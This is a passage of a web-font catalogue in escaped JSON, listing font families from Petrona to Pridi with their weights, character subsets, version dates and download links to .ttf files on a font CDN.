\"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8gsFFYpUN-dsIWs.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8mwFFYpUN-dsIWs.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/petrona/v28/mtGr4_NXL7bZo9XXgXdCu2vkCLkNEVtF8kUFFYpUN-dsIWs.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Philosopher\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/philosopher/v19/vEFV2_5QCwIS4_Dhez5jcVBpRUwU08qe.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/philosopher/v19/vEFX2_5QCwIS4_Dhez5jcWBrT0g21tqeR7c.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/philosopher/v19/vEFI2_5QCwIS4_Dhez5jcWjVamgc-NaXXq7H.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/philosopher/v19/vEFK2_5QCwIS4_Dhez5jcWBrd_QZ8tK1W77HtMo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Piazzolla\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"greek-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v29\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7LYx3Ly1AHfAAy5.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7JYxnLy1AHfAAy5.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7KGxnLy1AHfAAy5.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7LYxnLy1AHfAAy5.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7LqxnLy1AHfAAy5.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7IGwXLy1AHfAAy5.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7I_wXLy1AHfAAy5.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7JYwXLy1AHfAAy5.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b52SlTPu5rIkWIZjVKKtYtfxYqZ4RJBFzFfYUjkSDdlqZgy7JxwXLy1AHfAAy5.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhZqw3gX9BRy5m5M.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhRqx3gX9BRy5m5M.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhcSx3gX9BRy5m5M.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhZqx3gX9BRy5m5M.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhaix3gX9BRy5m5M.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhUS23gX9BRy5m5M.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhX223gX9BRy5m5M.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhRq23gX9BRy5m5M.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/piazzolla/v29/N0b72SlTPu5rIkWIZjVgI-TckS03oGpPETyEJ88Rbvi0_TzOzKcQhTO23gX9BRy5m5M.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Piedra\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/piedra/v21/ke8kOg8aN0Bn7hTunEyHN_M3gA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pinyon Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pinyonscript/v17/6xKpdSJbL9-e9LuoeQiDRQR8aOLQO4bhiDY.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pirata One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pirataone/v22/I_urMpiDvgLdLh0fAtoftiiEr5_BdZ8.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Plaster\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/plaster/v24/DdTm79QatW80eRh4Ei5JOtLOeLI.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Play\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/play/v17/6aez4K2oVqwIjtI8Hp8Tx3A.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/play/v17/6ae84K2oVqwItm4TOpc423nTJTM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Playball\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/playball/v16/TK3gWksYAxQ7jbsKcj8Dl-tPKo2t.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Playfair Display\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v30\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKdFvUDQZNLo_U2r.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKd3vUDQZNLo_U2r.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKebukDQZNLo_U2r.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKeiukDQZNLo_U2r.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfFukDQZNLo_U2r.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFvD-vYSZviVYUb_rj3ij__anPXJzDwcbmjWBN2PKfsukDQZNLo_U2r.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_qiTbtbK-F2rA0s.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_pqTbtbK-F2rA0s.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_naUbtbK-F2rA0s.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_k-UbtbK-F2rA0s.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_iiUbtbK-F2rA0s.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/playfairdisplay/v30/nuFRD-vYSZviVYUb_rj3ij__anPXDTnCjmHKM4nYO7KN_gGUbtbK-F2rA0s.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Playfair Display SC\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke85OhoaMkR6-hSn7kbHVoFf7ZfgMPr_pb4GEcM2M4s.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke87OhoaMkR6-hSn7kbHVoFf7ZfgMPr_lbwMFeEzI4sNKg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke80OhoaMkR6-hSn7kbHVoFf7ZfgMPr_nQIpNcsdL4IUMyE.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke82OhoaMkR6-hSn7kbHVoFf7ZfgMPr_lbw0qc4XK6ARIyH5IA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke80OhoaMkR6-hSn7kbHVoFf7ZfgMPr_nTorNcsdL4IUMyE.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/playfairdisplaysc/v15/ke82OhoaMkR6-hSn7kbHVoFf7ZfgMPr_lbw0kcwXK6ARIyH5IA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Plus Jakarta Sans\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_KU7NShXUEKi4Rw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_907NShXUEKi4Rw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_qU7NShXUEKi4Rw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_m07NShXUEKi4Rw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_d0nNShXUEKi4Rw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_TknNShXUEKi4Rw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIbaomQNQcsA88c7O9yZ4KMCoOg4IA6-91aHEjcWuA_KUnNShXUEKi4Rw.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ2lCR_QMq2oR82k.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ17CR_QMq2oR82k.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ0lCR_QMq2oR82k.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ0XCR_QMq2oR82k.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ37Dh_QMq2oR82k.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ3CDh_QMq2oR82k.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/plusjakartasans/v3/LDIZaomQNQcsA88c7O9yZ4KMCoOg4KozySKCdSNG9OcqYQ2lDh_QMq2oR82k.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Podkova\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWtFzcU4EoporSHH.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWt3zcU4EoporSHH.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWubysU4EoporSHH.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWuiysU4EoporSHH.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/podkova/v26/K2FufZ1EmftJSV9VQpXb1lo9vC3nZWvFysU4EoporSHH.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Poiret One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/poiretone/v14/UqyVK80NJXN4zfRgbdfbk5lWVscxdKE.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Poller One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pollerone/v19/ahccv82n0TN3gia5E4Bud-lbgUS5u0s.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Poly\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/poly/v16/MQpb-W6wKNitRLCAq2Lpris.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/poly/v16/MQpV-W6wKNitdLKKr0DsviuGWA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pompiere\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pompiere/v15/VEMyRoxis5Dwuyeov6Wt5jDtreOL.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pontano Sans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pontanosans/v13/qFdD35GdgYR8EzR6oBLDHa3qwjUMg1siNQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Poor Story\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/poorstory/v20/jizfREFUsnUct9P6cDfd4OmnLD0Z4zM.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Poppins\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/poppins/v20/pxiGyp8kv8JHgFVrLPTed3FBGPaTSQ.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/poppins/v20/pxiAyp8kv8JHgFVrJJLmE3tFOvODSVFF.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLFj_V1tvFP-KUEg.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmv1plEN2PQEhcqw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLDz8V1tvFP-KUEg.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLm21llEN2PQEhcqw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/poppins/v20/pxiEyp8kv8JHgFVrFJDUc1NECPY.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/poppins/v20/pxiGyp8kv8JHgFVrJJLed3FBGPaTSQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLGT9V1tvFP-KUEg.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmg1hlEN2PQEhcqw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLEj6V1tvFP-KUEg.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmr19lEN2PQEhcqw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLCz7V1tvFP-KUEg.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmy15lEN2PQEhcqw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLDD4V1tvFP-KUEg.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLm111lEN2PQEhcqw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/poppins/v20/pxiByp8kv8JHgFVrLBT5V1tvFP-KUEg.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLm81xlEN2PQEhcqw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Port Lligat Sans\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/portlligatsans/v18/kmKmZrYrGBbdN1aV7Vokow6Lw4s4l7N0Tx4xEcQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Port Lligat Slab\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/portlligatslab/v21/LDIpaoiQNgArA8kR7ulhZ8P_NYOss7ob9yGLmfI.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Potta One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pottaone/v16/FeVSS05Bp6cy7xI-YfxQ3Z5nm29Gww.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pragati Narrow\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pragatinarrow/v13/vm8vdRf0T0bS1ffgsPB7WZ-mD17_ytN3M48a.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/pragatinarrow/v13/vm8sdRf0T0bS1ffgsPB7WZ-mD2ZD5fd_GJMTlo_4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Praise\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/praise/v5/qkBUXvUZ-cnFXcFyDvO67L9XmQ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Prata\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/prata/v18/6xKhdSpbNNCT-vWIAG_5LWwJ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Preahvihear\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/preahvihear/v27/6NUS8F-dNQeEYhzj7uluxswE49FJf8Wv.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Press Start 2P\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/pressstart2p/v14/e3t4euO8T-267oIAQAu6jDQyK0nSgPJE4580.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Pridi\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v11\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc1SiE0jRUG0AqUc.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc02i00jRUG0AqUc.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/pridi/v11/2sDQZG5JnZLfkfWao2krbl29.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc1uik0jRUG0AqUc.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc1CjU0jRUG0AqUc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/pridi/v11/2sDdZG5JnZLfkc0mjE0jRUG0AqUc.ttf\"\n      },\n      